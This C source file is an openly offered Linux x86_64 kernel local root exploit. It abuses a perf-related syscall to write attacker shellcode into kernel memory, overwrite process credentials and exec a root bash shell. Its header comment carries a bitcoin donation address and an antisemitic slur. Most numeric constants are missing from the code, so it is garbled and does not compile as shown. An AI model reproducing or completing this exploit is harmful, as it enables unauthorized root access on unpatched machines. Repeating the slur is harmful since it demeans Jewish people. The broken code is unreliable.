/*

 * linux 2.6.37-3.x.x x86_64, ~100 LOC

 * gcc-4.6 -O2 semtex.c && ./a.out

 * 2010 sd@fucksheep.org, salut!

 *

 * update may 2013:

 * seems like centos 2.6.32 backported the perf bug, lol.

 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.

 */

#define _GNU_SOURCE 1

#include <stdint.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/mman.h>

#include <syscall.h>

#include <stdint.h>

#include <assert.h>

#define BASE  0x380000000

#define SIZE  0x010000000

#define KSIZE  0x2000000

#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {

  int i,j,k;

  uint64_t uids[] = { AB(), AB(), AB(), AB() };

  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-));

  uint64_t kbase = ((uint64_t)current)>>;

  uint32_t *fixptr = (void*) AB();

  *fixptr = -;

  for (i=; i<; i+=) {

    uint64_t *p = (void *)&current[i];

    uint32_t *t = (void*) p[];

    if ((p[] != p[]) || ((p[]>>) != kbase)) continue;

    for (j=; j<; j++) { for (k = ; k < ; k++)

      if (((uint32_t*)uids)[k] != t[j+k]) goto next;

      for (i = ; i < ; i++) t[j+i] = ;

      for (i = ; i < ; i++) t[j++i] = -;

      return;

next:;    }

  }

}

void sheep(uint32_t off) {

  uint64_t buf[] = { 0x4800000001,off,,,,0x300 };

  int fd = syscall(, buf, , -, -, );

  assert(!close(fd));

}

int  main() {

  uint64_t  u,g,needle, kbase, *p; uint8_t *code;

  uint32_t *map, j = ;

  int i;

  struct {

    uint16_t limit;

    uint64_t addr;

  } __attribute__((packed)) idt;

  assert((map = mmap((void*)BASE, SIZE, , 0x32, ,)) == (void*)BASE);

  memset(map, , SIZE);

  sheep(-); sheep(-);

  for (i = ; i < SIZE/; i++) if (map[i]) {

    assert(map[i+]);

    break;

  }

  assert(i<SIZE/);

  asm ("sidt %0" : "=m" (idt));

  kbase = idt.addr & 0xff000000;

  u = getuid(); g = getgid();

  assert((code = (void*)mmap((void*)kbase, KSIZE, , 0x32, , )) == (void*)kbase);

  memset(code, 0x90, KSIZE); code += KSIZE-; memcpy(code, &fuck, );

  memcpy(code-,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",

    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % );

  setresuid(u,u,u); setresgid(g,g,g);

  while (j--) {

    needle = AB(j+);

    assert(p = memmem(code, , &needle, ));

    if (!p) continue;

    *p = j?((g<<)|u):(idt.addr + 0x48);

  }

  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/) + );

  asm("int $0x4");  assert(!setuid());

  return execl("/bin/bash", "-sh", NULL);

}